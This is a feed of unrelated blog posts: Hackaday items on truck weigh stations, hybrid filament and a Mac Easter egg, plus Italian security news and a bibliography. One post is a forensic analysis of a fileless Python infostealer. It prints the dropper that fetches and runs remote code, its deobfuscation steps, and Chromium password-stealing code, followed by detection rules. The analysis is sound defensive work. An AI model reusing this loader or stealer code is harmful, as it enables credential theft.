Just how much damage trucks can cause to pavement is pretty alarming. Each axle of a truck creates a compression wave as it rolls along the pavement, as much as a few millimeters deep, depending on road construction and loads. The relentless cycle of compression and expansion results in pavement fatigue and cracks, which let water into the interior of the roadway. In cold weather, freeze-thaw cycles exert tremendous forces on the pavement that can tear it apart in short order. The greater the load on the truck, the more stress it puts on the roadway and the faster it wears out.

The other, perhaps more obvious reason to monitor axles passing over a highway is that they’re critical to truck safety. A truck’s axles have to support huge loads in a dynamic environment, and every component mounted to each axle, including springs, brakes, and wheels, is subject to huge forces that can lead to wear and catastrophic failure. Complete failure of an axle isn’t uncommon, and a driver can be completely unaware that a wheel has detached from a trailer and become an unguided missile bouncing down the highway. Regular inspections of the running gear on trucks and trailers are critical to avoiding these potentially catastrophic occurrences.

youtube.com/embed/veCl1BgoI74?…

Ways to Weigh

The first thing you’ll likely notice when driving past one of the approximately 700 official weigh stations lining the US Interstate highway system is how much space they take up. In contrast to the relatively modest weigh stations of the past, modern weigh stations take up a lot of real estate. Most weigh stations are optimized to get the greatest number of trucks processed as quickly as possible, which means constructing multiple lanes of approach to the scale house, along with lanes that can be used by exempt vehicles to bypass inspection, and turnout lanes and parking areas for closer inspection of select vehicles.

In addition to the physical footprint of the weigh station proper, supporting infrastructure can often be seen miles in advance. Fixed signs are usually the first indication that you’re getting near a weigh station, along with electronic signboards that can be changed remotely to indicate if the weigh station is open or closed. Signs give drivers time to figure out if they need to stop at the weigh station, and to begin the process of getting into the proper lane to negotiate the exit. Most weigh stations also have a net of sensors and cameras mounted to poles and overhead structures well before the weigh station exit. These are monitored by officers in the station to spot any trucks that are trying to avoid inspections.
Overhead view of a median weigh station on I-90 in Haugan, Montana. Traffic from both eastbound and westbound lanes uses left exits to access the scales in the center. There are ample turnouts for parking trucks that fail one test or another. Source: Google Maps.
Most weigh stations in the US are located off the right side of the highway, as left-hand exit ramps are generally more dangerous than right exits. Still, a single weigh station located in the median of the highway can serve traffic from both directions, so the extra risk of accidents from exiting the highway to the left is often outweighed by the savings of not having to build two separate facilities. Either way, the main feature of a weigh station is the scale house, a building with large windows that offer a commanding view of the entire plaza as well as an up-close look at the trucks passing over the scales embedded in the pavement directly adjacent to the structure.

Scales at a weigh station are generally of two types: static scales, and weigh-in-motion (WIM) systems. A static scale is a large platform, called a weighbridge, set into a pit in the inspection lane, with the surface flush with the roadway. The platform floats within the pit, supported by a set of cantilevers that transmit the force exerted by the truck to electronic load cells. The signal from the load cells is cleaned up by signal conditioners before going to analog-to-digital converters and being summed and dampened by a scale controller in the scale house.

The weighbridge on a static scale is usually long enough to accommodate an entire semi tractor and trailer, which accurately weighs the entire vehicle in one measurement. The disadvantage is that the entire truck has to come to a complete stop on the weighbridge to take a measurement. Add in the time it takes for the induced motion of the weighbridge to settle, along with the time needed for the driver to make a slow approach to the scale, and each measurement can add up to significant delays for truckers.
Weigh-in-motion sensor. WIM systems measure the force exerted by each axle and calculate a total gross vehicle weight (GVW) for the truck while it passes over the sensor. The spacing between axles is also measured to ensure compliance with state laws. Source: Central Carolina Scales, Inc.
To avoid these issues, weigh-in-motion systems are often used. WIM systems use much the same equipment as the weighbridge on a static scale, although they tend to use piezoelectric sensors rather than traditional strain-gauge load cells, and usually have a platform that’s only big enough to have one axle bear on it at a time. A truck using a WIM scale remains in motion while the force exerted by each axle is measured, allowing the controller to come up with a final GVW as well as weights for each axle. While some WIM systems can measure the weight of a vehicle at highway speed, most weigh stations require trucks to keep their speed pretty slow, under five miles per hour. This is obviously for everyone’s safety, and even though the somewhat stately procession of trucks through a WIM can still plug traffic up, keeping trucks from having to come to a complete stop and set their brakes greatly increases weigh station throughput.

Another advantage of WIM systems is that the spacing between axles can be measured. The speed of the truck through the scale can be measured, usually using a pair of inductive loops embedded in the roadway around the WIM sensors. Knowing the vehicle’s speed through the scale allows the scale controller to calculate the distance between axles. Some states strictly regulate the distance between a trailer’s kingpin, which is where it attaches to the tractor, and the trailer’s first axle. Trailers that are not in compliance can be flagged and directed to a parking area to await a service truck to come by to adjust the spacing of the trailer bogie.

Keep It Moving, Buddy

A PrePass transponder reader and antenna over Interstate 10 near Pearlington, Mississippi. Trucks can bypass a weigh station if their in-cab transponder identifies them as certified. Source: Tony Webster, CC BY-SA 2.0.
Despite the increased throughput of WIM scales, there are often too many trucks trying to use a weigh station at peak times. To reduce congestion further, some states participate in automatic bypass systems. These systems, generically known as PrePass for the specific brand with the greatest market penetration, use in-cab transponders that are interrogated by transmitters mounted over the roadway well in advance of the weigh station. The transponder code is sent to PrePass for authentication, and if the truck ID comes back to a company that has gone through the PrePass certification process, a signal is sent to the transponder telling the driver to bypass the weigh station. The transponder lights a green LED in this case, which stays lit for about 15 minutes, just in case the driver gets stopped by an overzealous trooper who mistakes the truck for a scofflaw.

PrePass transponders are just one aspect of an entire suite of automatic vehicle identification (AVI) systems used in the typical modern weigh station. Most weigh stations are positively bristling with cameras, some of which are dedicated to automatic license plate recognition. These are integrated into the scale controller system and serve to associate WIM data with a specific truck, so violations can be flagged. They also help with the enforcement of traffic laws, as well as locating human traffickers, an increasingly common problem. Weigh stations also often have laser scanners mounted on bridges over the approach lanes to detect unpermitted oversized loads. Image analysis systems are also used to verify the presence and proper operation of required equipment, such a mirrors, lights, and mudflaps. Some weigh stations also have systems that can interrogate the electronic logging device inside the cab to verify that the driver isn’t in violation of hours of service laws, which dictate how long a driver can be on the road before taking breaks.

Sensors Galore

IR cameras watch for heat issues on trucks at a Kentucky weigh station. Heat signatures can be used to detect bad tires, stuck brakes, exhaust problems, and even illicit cargo. Source: Trucking Life with Shawn
Another set of sensors often found in the outer reaches of the weigh station plaza is related to the mechanical status of the truck. Infrared cameras are often used to scan for excessive heat being emitted by an axle, often a sign of worn or damaged brakes. The status of a truck’s tires can also be monitored thanks to Tire Anomaly and Classification Systems (TACS), which use in-road sensors that can analyze the contact patch of each tire while the vehicle is in motion. TACS can detect flat tires, over- and under-inflated tires, tires that are completely missing from an axle, or even mismatched tires. Any of these anomalies can cause a tire to quickly wear out and potentially self-destruct at highway speeds, resulting in catastrophic damage to surrounding traffic.

Trucks with problems are diverted by overhead signboards and direction arrows to inspection lanes. There, trained truck inspectors will closely examine the flagged problem and verify the violation. If the problem is relatively minor, like a tire inflation problem, the driver might be able to fix the issue and get back on the road quickly. Trucks that can’t be made safe immediately might have to wait for mobile service units to come fix the problem, or possibly even be taken off the road completely. Only after the vehicle is rendered road-worthy again can you keep on trucking.

Featured image: “WeighStationSign” by [Wasted Time R]

hackaday.com/2025/06/26/field-…

Non è la prima volta che un attacco informatico si traduce in una perdita di vite umane.
Ne avevamo già parlato nell’articolo “I decessi avvenuti per il ransomware. I casi noti, le tendenze e il punto sull’Italia“, in cui analizzavamo il legame diretto tra incidenti cyber e morti documentate.

Purtroppo, questo fenomeno è sempre più frequente. Viviamo in un mondo interamente circondato da tecnologie digitali, e proprio per questo esposto al rischio di compromissione. Ma quando il bersaglio non è più un semplice dato, bensì un sistema critico come un pronto soccorso o un’infrastruttura sanitaria, le conseguenze non sono più virtuali: diventano tragicamente reali.

Secondo il National Health Service (NHS), l’anno scorso un attacco ransomware che ha interrotto gli esami del sangue in diversi ospedali di Londra ha contribuito alla morte di un paziente. L’attacco del gruppo di criminalità informatica Qilin contro il servizio di patologia Synnovis con sede a Londra, avvenuto lo scorso giugno, ha causato gravi interruzioni all’assistenza in numerosi ospedali del Servizio Sanitario Nazionale e presso fornitori di servizi sanitari di Londra.

A seguito dell’attacco, gli ospedali non sono stati in grado di eseguire gli esami del sangue alla normale velocità. Un portavoce del King’s College Hospital NHS Foundation Trust ha affermato che questo ritardo è stato tra “una serie di fattori contribuenti” che hanno portato alla morte di un paziente durante l’incidente, come riportato per primo dall’Health Service Journal.

“Purtroppo un paziente è morto improvvisamente durante l’attacco informatico. Come da prassi standard in questi casi, abbiamo effettuato un’analisi dettagliata delle sue cure”, ha dichiarato il portavoce. L’indagine sull’incidente relativo alla sicurezza del paziente ha individuato diversi fattori che hanno contribuito al decesso del paziente. Tra questi, la lunga attesa per l’esito di un esame del sangue a causa dell’attacco informatico che ha colpito i servizi di anatomia patologica in quel momento.

In una dichiarazione, il CEO di Synnovis, Mark Dollar, ha dichiarato: “Siamo profondamente addolorati nell’apprendere che l’attacco informatico criminale dell’anno scorso sia stato identificato come uno dei fattori che hanno contribuito alla morte di questo paziente. Siamo vicini alla famiglia coinvolta”.

Il mese scorso, Recorded Future News ha rivelato che due attacchi informatici che avrebbero interessato il Servizio Sanitario Nazionale (NHS) nel 2024 erano stati formalmente identificati come potenziali fattori di rischio per i pazienti. Si prevede che questi attacchi riguardino Synnovis e il Wirral University Teaching Hospital NHS Foundation Trust, causando ritardi nei trattamenti oncologici.

Si ritiene che i dati di oltre 900.000 individui siano stati compromessi dalle tattiche estorsive del gruppo ransomware, che prevedevano la pubblicazione dei risultati dei test che rivelavano i nomi dei pazienti con sintomi di infezioni sessualmente trasmissibili e cancro.

Un’analisi dei dati condotta dagli specialisti in violazioni dei dati CaseMatrix ha identificato nomi personali, date di nascita, numeri di telefono del Servizio Sanitario Nazionale e, in alcuni casi, dettagli di contatto personali, insieme ai moduli di patologia e istologia utilizzati per condividere i dati dei pazienti tra reparti medici e istituzioni. A un anno dalla violazione, i pazienti interessati non sono ancora stati informati su quali dati siano stati esposti nell’incidente.

L'articolo È morto per colpa di un ransomware! Un’altra vittima si aggiunge alla lista proviene da il blog della sicurezza informatica.

TLP: AMBER
Analista: Agostino Pellegrino, Crescenzo Cuoppolo, Alessio Bandini
Data ultima revisione: 2025-06-24

Questo report tecnico forense documenta l’analisi completa di un infostealer multi-stadio veicolato tramite un loader fileless in Python, identificato con la sigla “AP”. L’intera catena di infezione è eseguita in memoria e sfrutta servizi legittimi pubblici (Telegram, is.gd, paste.rs) per evitare la rilevazione e semplificare l’aggiornamento remoto del payload.

Il file iniziale, denominato Photos, contiene un dropper che esegue dinamicamente un secondo stadio offuscato, il quale a sua volta decodifica ed esegue in memoria un infostealer capace di esfiltrare informazioni sensibili da browser Chromium.

Catena di Infezione

Stadio 1 – Dropper Iniziale

Il file Photos contiene codice Base64 offuscato:

___________ = 'ADN_UZJomrp3vPMujoH4bot'; exec(__import__('base64').b64decode('...'))

Decodifica del codice:

import requests, re
exec(
requests.get(
requests.head(
f'https://is.gd/{match.group(1)}', allow_redirects=True
).url
).text
)

if (
match := re.search(
r'

Funzionamento:

• Recupera da un canale Telegram un codice og:description (es. fVmzS)
• Usa is.gd per risolvere il link accorciato
• Recupera un payload da paste.rs ed esegue dinamicamente

Stadio 2 – Loader Offuscato

Contenuto scaricato da paste.rs/fVmzS. Esegue la seguente catena:

exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode("c$|c~*|PFlk|y|1XNVIgA|vOF$g0Ys7>c3D)_@p{S!e)(1e%eo3lNe(LIXmGNenkpZCz$

Dopo b85 → zlib → marshal, è necessario un ulteriore passaggio:

decoded = bytearray([b ^ 0x04 for b in payload_bytes])

Il risultato è un bytecode deoffuscato eseguibile direttamente in memoria:

import os, shutil, zipfile, sqlite3
from Cryptodome.Cipher import AES
import win32crypt
import json
import base64

# Estrazione dati da Chromium (semplificato)

def get_chrome_data():
local_state_path = os.path.expanduser('~') + r"\AppData\Local\Google\Chrome\User Data\Local State"
with open(local_state_path, "r", encoding="utf-8") as f:
local_state = json.loads(f.read())
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])[5:]
key = win32crypt.CryptUnprotectData(key, None, None, None, 0)
[1] login_data_path = os.path.expanduser('~') + r"\AppData\Local\Google\Chrome\User Data\Default\Login Data"
shutil.copy2(login_data_path, "Loginvault.db")
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
cursor.execute("SELECT origin_url, username_value, password_value FROM logins")
for row in cursor.fetchall():
login_url = row
[0] username = row
[1] password = win32crypt.CryptUnprotectData(row[2])[1].decode()
print(f"URL: {login_url}\nUsername: {username}\nPassword: {password}\n")
cursor.close()
conn.close()
os.remove("Loginvault.db")
get_chrome_data()

Stadio 3 – Infostealer

Il codice risultante:

• Raccoglie credenziali, cookie, cronologia e carte da Chromium
• Cattura fingerprinting del sistema
• Comprimi dati in archivio .zip
• Prepara e invia l’esfiltrazione verso un server remoto (C2)

Indicatori di Compromissione

Tecniche MITRE ATT&CK

• T1059 – Command and Scripting Interpreter
• T1027 – Obfuscated Files or Information
• T1071.001 – Web Protocols
• T1082 – System Information Discovery
• T1567.002 – Exfiltration over Web Services
• T1218.010 – Proxy Execution (custom variant)

Rilevazione

Sigma Rule

title: Python Fileless Loader via Telegram and is.gd
logsource:
category: process_creation
product: windows
detection:
selection:
Image: '*\python.exe'
CommandLine|contains:
- requests.get(
- exec(
- t.me/
- is.gd/
condition: selection
level: high
description: Rileva dropper Python fileless con payload remote

YARA Rule

rule Fileless_Telegram_Loader {
meta:
description = "Rileva loader fileless basato su Telegram + is.gd"
author = "Agostino Pellegrino (apinfosec.com)"
version = "1.1"
date = "2025-06-24"
strings:
$a = "exec(requests.get(" ascii
$b = "https://t.me/" ascii
$c = "https://is.gd/" ascii
$d = "og:description" ascii
condition:
all of them and filesize

Raccomandazioni

• Isolare ambienti Python non gestiti
• Bloccare traffico a t.me, is.gd, paste.rs ove non necessario
• Attivare logging avanzato su processi RAM-residenti
• Applicare detection YARA e Sigma in EDR/SIEM
• Segnalare a CSIRT nazionale

Conclusioni

L’analisi tecnica condotta ha evidenziato l’elevato livello di sofisticazione dell’infostealer “AP”, capace di operare completamente in memoria, eludendo gran parte dei meccanismi di rilevamento tradizionali. La catena d’infezione multi-stadio utilizza un dropper fileless scritto in Python e sfrutta servizi pubblici legittimi — come Telegram, is.gd e paste.rs — per veicolare, aggiornare e rendere dinamico il payload finale.

Il secondo stadio, fortemente offuscato, culmina nell’esecuzione di un infostealer con capacità avanzate di esfiltrazione dati da browser Chromium-based, comprese credenziali salvate, cookie, cronologia e informazioni sensibili.

L’uso creativo e malevolo di meccanismi comuni (come i meta tag HTML, URL accorciati e servizi di messaggistica) rende questa minaccia particolarmente insidiosa, dimostrando una crescente tendenza all’abuso di infrastrutture legittime per finalità illecite.

Le tecniche MITRE ATT&CK individuate confermano il comportamento stealth e modulare del malware. L’adozione di meccanismi di rilevazione specifici, come regole Sigma e YARA personalizzate, è fondamentale per mitigare efficacemente questa minaccia. Inoltre, l’implementazione di policy restrittive e il monitoraggio continuo degli ambienti Python non gestiti rappresentano misure difensive prioritarie.

Questo caso studio rappresenta un chiaro esempio dell’evoluzione dei moderni infostealer verso architetture completamente fileless, con capacità di persistenza e aggiornamento che richiedono una risposta difensiva altrettanto dinamica e proattiva.

L'articolo Un nuovo infostealer fileless viene veicolato da Telegram e dai servizi legittimi proviene da il blog della sicurezza informatica.

The Stronghero 3D hybrid PLA PETG filament, with visible PETG core. (Credit: My Tech Fun, YouTube)
Sometimes you see an FDM filament pop up that makes you do a triple-take because it doesn’t seem to make a lot of sense. This is the case with a hybrid PLA/PETG filament by Stronghero 3D that features a PETG core. This filament also intrigued [Dr. Igor Gaspar] who imported a spool from the US to have a poke at it to see why you’d want to combine these two filament materials.

According to the manufacturer, the PLA outside makes up 60% of the filament, with the rest being the PETG core. The PLA is supposed to shield the PETG from moisture, while adding more strength and weather resistance to the PLA after printing. Another interesting aspect is the multi-color look that this creates, and which [Igor]’s prints totally show. Finding the right temperatures for the bed and extruder was a challenge and took multiple tries with the Bambu Lab P1P including bed adhesion troubles.

As for the actual properties of this filament, the layer adhesion test showed it to be significantly worse than plain PLA or PETG when printed at extruder temperatures from 225 °C to 245 °C. When the shear stress is put on the material instead of the layer adhesion, the results are much better, while torque resistance is better than plain PETG. This is a pattern that repeats across impact and other tests, with PETG more brittle. Thermal deformation temperature is, unsurprisingly, between both materials, making this filament mostly a curiosity unless its properties work much better for your use case than a non-hybrid filament.

youtube.com/embed/PnMUxLlnPSA?…

hackaday.com/2025/06/26/pla-wi…

Citrix ha segnalato una nuova vulnerabilità critica nelle sue appliance NetScaler, già attivamente sfruttata dagli aggressori. Il problema è identificato con l’identificativo CVE-2025-6543 e riguarda le diffuse soluzioni NetScaler ADC e NetScaler Gateway utilizzate dalle aziende per l’accesso remoto e la protezione del perimetro di rete.

Come riportato nella nota ufficiale di Citrix, exploit per questa vulnerabilità sono già stati osservati in attacchi reali. CVE-2025-6543 (punteggio CVSS: 9,2) consente l’invio di una richiesta speciale da remoto e senza autenticazione, causando il malfunzionamento e l’indisponibilità del dispositivo. In particolare, si tratta di un completo disservizio che può paralizzare il funzionamento dell’infrastruttura aziendale.

La vulnerabilità interessa le versioni di NetScaler ADC e Gateway

• NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-47.46
• NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-59.19
• NetScaler ADC 13.1-FIPS and NDcPP BEFORE 13.1-37.236-FIPS and NDcPP

Sono interessati solo i dispositivi configurati come gateway, inclusi server VPN, proxy di applicazioni ICA, VPN clientless (CVPN), proxy desktop remoto e server di autenticazione virtuale (AAA).

Citrix ha già rilasciato patch per risolvere la vulnerabilità CVE-2025-6543 (monitorata internamente come CTX694788 ). Gli aggiornamenti sono disponibili per tutte le versioni interessate di NetScaler. L’azienda consiglia vivamente agli amministratori di installare questi aggiornamenti il ​​prima possibile e di rivedere le configurazioni dei dispositivi.

La comparsa di CVE-2025-6543 coincide con un altro problema nei prodotti Citrix, denominato ufficiosamente CitrixBleed 2 e identificato come CVE-2025-5777. Questa vulnerabilità consente agli aggressori di dirottare le sessioni utente attive estraendo token di autenticazione dalla memoria del dispositivo. Questa tecnica era già stata utilizzata dagli hacker criminali nel 2023, quando una vulnerabilità simile, chiamata CitrixBleed, fu sfruttata per attaccare il settore pubblico e grandi aziende, inclusi casi con successiva diffusione sulle reti interne.

Gli esperti sottolineano che entrambe le vulnerabilità sono critiche e richiedono un intervento immediato da parte dei reparti IT. Oltre a installare le patch, si consiglia di monitorare attivamente il comportamento dei dispositivi di rete, controllare le sessioni utente attive e rafforzare le policy di accesso.

Citrix non ha ancora fornito ulteriori chiarimenti sui dettagli dello sfruttamento di CVE-2025-6543.

L'articolo Citrix: nuova vulnerabilità critica da 9,2 colpisce NetScaler – attacchi in corso! proviene da il blog della sicurezza informatica.

Di Corinto, A. (2024). Postfazione in Mezza, M., Connessi a morte. Guerra, media e democrazia nella società della cybersecurity, Roma, Donzelli Editore, pp. 157-168, ISBN: 978-88-5522-686-8

Di Corinto, A. (2023). Ecco come funziona lo strategic information warfare. In: (a cura di): Profumi, E., Una pace senza armi. Dall’Ucraina alla guerra senza fine, p. 159-165, Roma: Round Robin, ISBN: 979-12-54850-16-9

Di Corinto, A. (2023). Netwar, come cambia l’hacktivismo nella guerra cibernetica. In: Rivista italiana di informatica e diritto – RIID, Anno 5, Fascicolo 2, Sezione monografica, Istituto di Informatica Giuridica e Sistemi Giudiziari del CNR Rivista scientifica Area 12 (ANVUR) Classe A, ISSN 2704-7318

Di Corinto, A. (2022). Data Commons: privacy e cybersecurity sono diritti umani fondamentali. In: (a cura di): Abba, L. Lazzaroni, A., Pietrangelo, M., La Internet Governance e le sfide della trasformazione digitale, p. 43-51, Napoli: Editoriale Scientifica, ISBN: 979-12-5976-403-4

Di Corinto, A. (2022). #Cryptomania. Milano, Ulrico Hoepli Editore S.p.A

Di Corinto, A. (2021). Prefazione, in Alù. A., Viaggio nel futuro. Verso una nuova era tecno-umana, p. 9-21, Enna: Bonfirraro Editore, ISBN: 978-88-6272-263-6

Di Corinto, A. (2020). Stefano Rodotà e la Magna Charta di Internet. In: (a cura di): Abba, L. Alù A, Il valore della Carta dei diritti di Internet. p. 7-22, Napoli: Editoriale Scientifica, ISBN: 9788893917353

Di Corinto, A. (2019). Chip sotto pelle: chi tutela la privacy?. FORMICHE, vol. 144, p. 66-67, ISSN: 1824-9914

Di Corinto, A. (2019). Riprendiamoci la rete! Piccolo manuale di Autodifesa digitale per giovani generazioni. ROMA:Eurilink University Press Srl, ISBN: 9788885622760

Di Corinto, A. (2018). Comunicare la cybersecurity. In: (a cura di): Baldoni R, De Nicola R, Prinetto P, Il Futuro della Cybersecurity in Italia: Ambiti Progettuali Strategici. Roma:Consorzio Interuniversitario Nazionale per l’Informatica – CINI, ISBN: 9788894137330

Di Corinto, A. (2018). La sicurezza informatica è un diritto umano. In: (a cura di): De Luca V Terzi di Sant’Agata G. M Voce F, Il ruolo dell’Italia nella sicurezza cibernetica. p. 75-85, MILANO: FrancoAngeli, ISBN: 978-88-917-6804-9

Di Corinto, A. (2018). Politiche di liberazione nella telematica del 2000. In: (a cura di): Speroni F Tozzi T , Arte, media e liberazione. p. 329-350, FIRENZE: Polistampa, ISBN 9788859619239

Abba L, Di Corinto, A. (a cura di) (2017). Il futuro trent’anni fa. Quando internet è arrivata in italia. Lecce:Piero Manni Editore, ISBN: 978-88-6266-798-2

Di Corinto, A. (2017). Hacker e BBS, centri sociali, reti civiche: chi (prima di Internet) ha diffuso la telematica amatoriale. In: (a cura di): Abba, L., Di Corinto, A. Il futuro trent’anni fa Quando Internet è arrivata in Italia. p. 106-112, San Cesario di Lecce:Piero Manni srl, ISBN: 978-88-6266-798-2

Di Corinto, A. (2017). Internet non è il web. Tutto quello che devi sapere sulla Rete in 10 parole. In: (a cura di): Abba, L., Di Corinto, A., Il futuro trent’anni fa. Quando Internet è arrivata in Italia. p. 12-17, San Cesario di Lecce:PIERO MANNI S.r.l., ISBN: 978-88-6266-798-2

Di Corinto, A. (2017). Internet non è nata come progetto militare, mettetevelo in testa. In: (a cura di): Abba L, Di Corinto, A., Il futuro trent’anni fa Quando Internet è arrivata in Italia. p. 18-22, San Cesario di Lecce: Piero Manni srl, ISBN: 978-88-6266-798-2

Di Corinto, A., Mazzone G, Masotti R., Melandri L (2017). A long way to go a truly multistakeholder environment. In: (a cura di): Association for Progressive Communication, National and Regional Internet Governance Forum Initiatives (NRIs). p. 154-157, APC, ISBN: 9789295102835

Di Corinto, A. (2016). Ci mostriamo per nasconderci, ci nascondiamo per mostrarci. In: Coleman G. I Mille volti di Anonymous. La vera storia del gruppo hacker più provocatorio al mondo. p. 5-10, VITERBO:Stampa Alternativa, ISBN: 9788862225069

Di Corinto, A., Mazzone G, Masotti R., Melandri L (2016). The Resource Gap between international commitments and reality. In: (a cura di): Association for Progressive

Communication and International Development Center, Economic, Social and cultural rights and the internet. p. 129-133, APC Cairola A, Di Corinto, A., Mazzone G, Masotti R., Melandri L (2015). Sexual rights and the internet. In: (a cura di): Association for Progressive Communication (APC) and Humanist Insitute for Cooperation with Developing Countries (Hivos), Sexual rights and the internet. p. 152-155, APC

Di Corinto, A. (2015). Nuovi Linguaggi. In: AA VV. Il Futuro ci insegue. Prospettive. p. 40-50, Milano:Edizioni di Maieutica, ISBN: 8898918097

Di Corinto, A. (2014). Un dizionario hacker. LECCE:Manni, ISBN: 978-88-6266-516-2

Di Corinto, A. (2014). Critica alla sinistra che ha perso il treno dell’innovazione . In: (a cura di): Grandi A, Riunificare il mondo del lavoro è possibile oggi? ROMA: Ediesse, ISBN: 88-230-1850-1

Di Corinto, A. (2014). Democrazia Elettronica. In: (a cura di): Giunchi G, Marino J, Trumpy S, e-Democracy. Internet society, Pisa.

Di Corinto, A., Reitano L (2014). Information warfare e hacking, le nuove frontiere dell’intelligence. LIMES, ISSN: 1124-9048

Cairola A, Di Corinto, A., Mazzone G, Lea Melandri, Masotti R (2013). The internet and activism for women’s rights. In: Association for Progressive Communication, Hivos. Women’s rights, gender and ICTs. p. 142-145, APC, ISBN: 978-92-95102-06-4

Cairola A, Di Corinto, A., Mazzone G, De Martin J C, (2012). Popular resistance to corruption in Italy. In: APC; Hivos. The internet and corruption . APC, ISBN: 978-92-95096-85-1

Di Corinto, A. (2012). Hacking netculturale e sabotaggio. In: (a cura di): Franco Berardi Bifo e Valerio Monteventi, Come si fa. Tecniche e prospettive di rivoluzione. p. 195-207, LECCE:Manni, ISBN: 978-88-6266-414-1

Di Corinto, A. (2011). Hacktivism. Gli hacker e l’economia informazionale. In: (a cura di): Luca Cian, Comunicazione liberata. Altri modi di comunicare e partecipare. p. 14-29, MILANO:Francesco Brioschi, ISBN: 9788895399638

Di Corinto, A. (2011). Lo sapevate già? In: Weinshenk M S. 100 cose che ogni designer deve conoscere sulle persone. Milano:Pearson, ISBN: 9788871926483

Di Corinto, A. Mazzone G (2011). Blocking Italy’s “gag law”. In: (a cura di): APC SIDA, Internet rights and democratisation. APC

Di Corinto, A. (2010). Così il web aiuta la pubblica amministrazione ad innovare. In: (a cura di): Marzano F, Romita A, Il senso dell’innovazione. p. 37-41, Pisa: PLUS Pisa University Press, ISBN: 8884927099

Di Corinto, A. (2010). Internet, l’Europa e i diritti digitali. In: (a cura di): Vallinoto N, Vannuccini S, Europa 2.0. Prospettive ed evoluzioni del sogno europeo. p. 79-89, VERONA:Ombre Corte, ISBN: 9788895366685

Di Corinto, A., Gilioli A (2010). I nemici della rete. L’Italia sta perdendo la corsa al digitale. Tutti i colpevoli, per incapacità o interesse, di un disastro che ci costerà caro. Milano: Biblioteca Universale Rizzoli (BUR) – RCS libri, ISBN: 8817042757

Di Corinto, A. (2009). Culture, a common heritage. Culturalazio.it: an open platform for user generated contents. In: AA VV. (a cura di): Formez, E-gov 2.0: pave the way for eParticipation. “Culture, a common heritage”. p. 150-154, ROMA: Eurospace, ISBN: 978-88-903018-3-4

Di Corinto, A. (2007). Free software as a Commons. In: (a cura di): Hilary Wainwright, Berlinguer M, Dove F, Fuster Morrell M I, Reyes O, Subirats J, Networked Politics – Rethinking political organisation in an age of movements and networks. p. 45-47, ROMA: XLEDIZIONI, ISBN: 978-90-71007-17-0

Di Corinto, A. (2007). Il remix della cultura. In: (a cura di): Piperno E, Strati della cultura. Accessibilità nel contemporaneo, giovani – relazioni – diritti -spazi. p. 121-126, Arci , Ravenna, 11, 12, 13 Ottobre 2007

Di Corinto, A. (2007). Parole di una nuova politica: Open Source. In: AA VV. (a cura di): Transform! Italia, Parole di una nuova politica. ROMA:XLEDIZIONI, ISBN: 8860830125

Di Corinto, A. (2007). Prefazione. In: Bargeillon N. Piccolo manuale di autodifesa intellettuale. Santarcangelo di Romagna: Apogeo Education – Maggioli Editore, ISBN: 9788838787737

Di Corinto, A. (2006). Revolution OS II. Software libero, proprietà intellettuale, cultura e politica. Con DVD. ISBN: 9788850323272

Di Corinto, A. (2006). “Open Source Politics”. Comunità virtuali, blogs e mediattivisti. La democrazia dell’informazione tra TV e nuovi media. In: (a cura di): Ferraris P, Rete. Dinamiche sociali e innovazioni tecnologiche. p. 107-115, ROMA:Carocci Editore, ISBN: 9788843040001

Di Corinto, A. (a cura di) (2006). L’innovazione necessaria. Di Corinto, A. MILANO:Rgb, ISBN: 88-6084-038-4

Di Corinto, A. (2005). Liberi e Binari. La convergenza tra i programmatori/sostenitori del software libero e i movimenti sociali. In: AA.VV., La privatizzazione della vita. Brevetti, monopoli, multinazionali. p. 183-187, Milano:Edizioni Punto Rosso ISBN 8883510410

Di Corinto, A. (2005). “Open Source Politics”. Comunità virtuali, blogs e mediattivisti. La democrazia dell’informazione tra TV e nuovi media. PAROLECHIAVE, vol. 34, p. 107-115, ISSN: 1122-5300

Di Corinto, A. (2004). Internet non è il paradiso. In: Lovink G. Internet non è il paradiso. p. IX-XXIV, MILANO: Apogeo, ISBN: 9788850322732

Di Corinto, A. (2003). Revolution OS. In: (a cura di): Mari A Romagnolo S, Revolution OS. MILANO:Apogeo, ISBN: 8850321546

Di Corinto, A., Tozzi T (2002). Hacktivism. La libertà nelle maglie della rete. ROMA:Manifestolibri, ISBN: 9788872852491

Di Corinto, A. (2001). Don’t hate the media, become the media. In: AA VV. La sfida al G8. p. 157-180, ROMA:Manifestolibri, ISBN: 8872852617

Di Corinto, A. (1998). Gettare una ragnatela sulla trasformazione. Appunti per una rete civica. In: (a cura di): Freschi A C, Leonardi L, Gettare una ragnatela sulla trasformazione. p. 201-208, FIRENZE:City Lights Italia, ISBN: 9788887159127

Di Corinto, A. (1998). Il ritornello del telelavoro. In: (a cura di): Freschi A C, Leonardi L, Una ragnatela sulla trasformazione. p. 119-125, FIRENZE:City Lights Italia, ISBN: 9788887159127

dicorinto.it/formazione/arturo…

A favourite thing for the developers behind a complex software project is to embed an Easter egg: something unexpected that can be revealed only by those in the know. Apple certainly had their share of them in their early days, a practice brought to a close by Steve Jobs on his return to the company. One of the last Macs to contain one was the late 1990s beige G3, and while its existence has been know for years, until now nobody has decoded the means to display it on the Mac. Now [Doug Brown] has taken on the challenge.

The Easter egg is a JPEG file embedded in the ROM with portraits of the team, and it can’t be summoned with the keypress combinations used on earlier Macs. We’re taken on a whirlwind tour of ROM disassembly as he finds an unexpected string in the SCSI driver code. Eventually it’s found that formatting the RAM disk with the string as a volume name causes the JPEG to be saved into the disk, and any Mac user can come face to face with the dev team. It’s a joy reserved now for only a few collectors of vintage hardware, but still over a quarter century later, it’s fascinating to learn about. Meanwhile, this isn’t the first Mac easter egg to find its way here.

hackaday.com/2025/06/26/reveal…

Continuiamo la serie di articoli sugli IAB scrivendo di un cyber contractor iraniano che non solo lavora come broker di accesso iniziale ma fornisce supporto alle ransomware gang per riempire di denaro le loro e le proprie tasche.

